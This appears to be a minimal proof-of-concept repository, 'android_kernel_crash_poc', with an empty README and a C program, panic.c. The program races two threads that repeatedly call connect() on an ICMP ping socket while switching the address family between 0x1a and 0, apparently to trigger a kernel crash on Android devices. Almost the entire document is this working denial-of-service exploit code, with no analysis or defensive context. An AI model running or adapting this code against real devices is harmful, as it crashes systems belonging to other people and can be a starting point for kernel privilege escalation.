├── README.md
└── panic.c


/README.md:
--------------------------------------------------------------------------------
1 | # android_kernel_crash_poc
2 | 


--------------------------------------------------------------------------------
/panic.c:
--------------------------------------------------------------------------------
 1 | 
 2 | #include <stdio.h>
 3 | #include <sys/socket.h>
 4 | #include <arpa/inet.h>
 5 | #include <stdlib.h>
 6 | static int sockfd = 0;
 7 | static struct sockaddr_in addr = {0};
 8 | 
 9 | void fuzz(void * param){
10 |     while(1){
11 |         addr.sin_family = 0;//rand()%42;
12 |         printf("sin_family1 = %08lx\n", addr.sin_family);
13 |         connect(sockfd, (struct sockaddr *)&addr, 16); 
14 |     }
15 | }
16 | int main(int argc, char **argv)
17 | {
18 |     sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
19 |     int thrd;
20 |     pthread_create(&thrd, NULL, fuzz, NULL);
21 |     while(1){
22 |         addr.sin_family = 0x1a;//rand()%42;
23 |         addr.sin_port = 0;
24 |         addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
25 |         connect(sockfd, (struct sockaddr *)&addr, 16);
26 |         addr.sin_family = 0;
27 |     }
28 |     return 0;
29 | }


--------------------------------------------------------------------------------